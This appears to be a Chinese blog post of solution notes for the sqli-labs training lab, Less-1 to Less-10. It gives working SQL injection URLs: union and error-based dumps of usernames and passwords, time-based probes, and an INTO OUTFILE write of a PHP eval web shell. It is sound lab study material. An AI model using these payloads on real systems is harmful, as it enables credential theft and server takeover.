Sqli-Labs做题笔记:Less-1 - Less-10

sqli-labs

SQL注入分类:

  1. 可回显的注入:
  • 可以联合查询的注入
  • 报错注入
  • 通过注入进行DNS请求,从而达到回显的目的
  1. 不可回显的注入
  • Bool盲注
  • 时间盲注
  1. 二次注入

Less-1:

http://localhost/sqli-labs-kali2-master/Less-1/?id=-1%27+union+select+1,group_concat(username),group_concat(password)+from+security.users+--+

Less-2:

http://localhost/sqli-labs-kali2-master/Less-2/?id=-1+union+select+1,group_concat(username),group_concat(password)+from+security.users+--+

Less-3:

http://localhost/sqli-labs-kali2-master/Less-3/?id=-1%27)+union+select+1,group_concat(username),group_concat(password)+from+security.users+--+   

Less-4:

http://localhost/sqli-labs-kali2-master/Less-4/?id=-1%22)+union+select+1,group_concat(username),group_concat(password)+from+security.users+--+

Less-5:

http://localhost/sqli-labs-kali2-master/Less-5/?id=1%27+union+select+updatexml(1,concat(0x7e,(substr((SELECT+group_concat(username,0x7e,password)+from+security.users),1)),0x7e),1)+--+

Less-6:

http://localhost/sqli-labs-kali2-master/Less-6/?id=1"+union+select+updatexml(1,concat(0x7e,(substr((SELECT+group_concat(username,0x7e,password)+from+security.users),1)),0x7e),1)+--+

Less-7:

http://localhost/sqli-labs-kali2-master/Less-7/?id=1%27))%20union%20select%201,%27%3C?php%20eval($_REQUEST[23]);%20?%3E%27,3%20into%20outfile%20%22/var/lib/mysql/1.php%22+--+

Less-8:

bool盲注
http://localhost/sqli-labs-kali2-master/Less-8/?id=1' and if(substr(database(),1,1)='S',sleep(5),sleep(1))+--+

Less-9:

http://localhost/sqli-labs-kali2-master/Less-9/?id=1' and if(substr(database(),1,1)='S',sleep(5),sleep(1))+--+

Less-10:

http://localhost/sqli-labs-kali2-master/Less-10/?id=1" and if(substr(database(),1,1)='S',sleep(5),sleep(1))+--+
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值